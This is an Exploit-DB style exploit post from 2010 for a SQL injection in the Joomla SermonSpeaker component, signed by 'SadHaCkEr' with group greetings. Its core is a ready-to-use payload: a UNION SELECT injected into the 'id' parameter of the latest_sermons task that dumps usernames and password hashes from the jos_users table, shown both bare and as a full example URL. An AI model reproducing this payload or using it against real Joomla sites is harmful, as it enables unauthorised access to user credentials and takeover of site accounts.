Joomla! Component SermonSpeaker - SQL Injection

EDB-ID:

12184




Platform:

PHP

Date:

2010-04-12


# Title:Joomla Component com_sermonspeaker SQL Injection Vulnerability 
# Author: SadHaCkEr
# Data  : 2010-04-12
 
[~]######################################### InformatioN #############################################[~]

#AUTHOR:            SadHaCkEr                                                
#Email:             n5s@hotmail.[choose ANY ONE]   IF U lucky  U will Find Me                             
#Website:           http://www.sadx.297m.com/                                
#Forum :            http://v4-team.net/cc                                    
    
[~]#########################################   ExploiT   #############################################[~]
  
[~] Vulnerable  :
  
http://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=[SQL]
  
[~] ExploiT         :
  
-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/
  
[~] Example         :
  
http://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/

 
   
[~]######################################### ThankS To ... ############################################[~]
  
[~] Special Thanks 2 :
  
RoMaNcYxHaCkEr, Mr.Safa7, Mn7oS & Sniper Code & Red Virus & HCJ & Mr.Wolf & ayaster & All Trayg Member .
  
[~] Trayg Team + V4-Team + SVT Team 
  
[~] GreetZ 2: My LoV3r + My Keyboard
 
[~]#########################################  ./Done   #############################################[~]